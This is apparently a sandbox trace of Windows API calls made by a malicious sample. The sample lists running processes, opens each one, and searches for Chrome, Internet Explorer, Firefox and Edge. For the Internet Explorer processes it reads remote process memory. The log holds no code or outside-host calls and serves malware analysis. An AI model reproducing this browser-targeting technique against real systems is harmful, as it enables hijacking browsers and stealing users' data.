	[0224.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.295] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.295] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0224.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x59c4
	[0224.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.296] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0224.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.297] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.297] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0224.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.298] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.298] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0224.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0224.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0224.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x59c8
	[0224.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.300] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0224.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.301] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.301] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0224.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.302] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0224.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x59cc
	[0224.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.303] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0224.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.303] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.304] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0224.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.304] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0224.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x59d0
	[0224.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.305] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0224.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.305] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.306] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0224.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.306] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0224.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x59d4
	[0224.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.307] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0224.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.307] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.308] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0224.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.308] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.308] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0224.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x59d8
	[0224.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.309] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0224.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.310] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.310] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0224.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.311] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.311] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0224.312] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x59dc
	[0224.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.312] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0224.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.312] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.312] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0224.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.313] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.314] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0224.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x59e0
	[0224.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.315] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0224.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.315] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.316] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0224.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.316] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.317] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0224.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x59e4
	[0224.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.318] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0224.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.318] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.319] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0224.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.319] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0224.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x59e8
	[0224.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.320] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0224.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.321] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.321] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0224.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.321] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0224.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x59ec
	[0224.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.322] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0224.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.323] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.323] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0224.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.323] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0224.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x59f0
	[0224.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.324] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0224.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.325] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.325] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0224.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.325] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.326] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0224.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x59f4
	[0224.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.327] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0224.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.327] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.328] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0224.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.329] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.330] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0224.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x59f8
	[0224.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.331] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0224.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.331] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.332] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0224.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.332] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.332] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0224.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x59fc
	[0224.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.333] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0224.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.334] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.334] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0224.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.335] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.336] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0224.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5a00
	[0224.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.336] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0224.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.337] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.337] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0224.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.338] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5a04
	[0224.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.339] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.339] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.340] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.340] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.340] NtQueryInformationProcess (in: ProcessHandle=0x5a04, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.340] ReadProcessMemory (in: hProcess=0x5a04, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.340] ReadProcessMemory (in: hProcess=0x5a04, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.340] ReadProcessMemory (in: hProcess=0x5a04, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.340] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.341] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5a08
	[0224.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.341] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.342] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.342] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.342] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.343] NtQueryInformationProcess (in: ProcessHandle=0x5a08, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.343] ReadProcessMemory (in: hProcess=0x5a08, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.343] ReadProcessMemory (in: hProcess=0x5a08, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.343] ReadProcessMemory (in: hProcess=0x5a08, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.343] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.343] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5a0c
	[0224.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.344] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.345] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.345] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.345] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.346] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0224.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5a10
	[0224.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.347] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0224.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.347] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.347] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0224.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.348] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.348] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5a14
	[0224.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.349] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.349] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.350] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.350] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.351] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5a18
	[0224.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.352] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.352] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
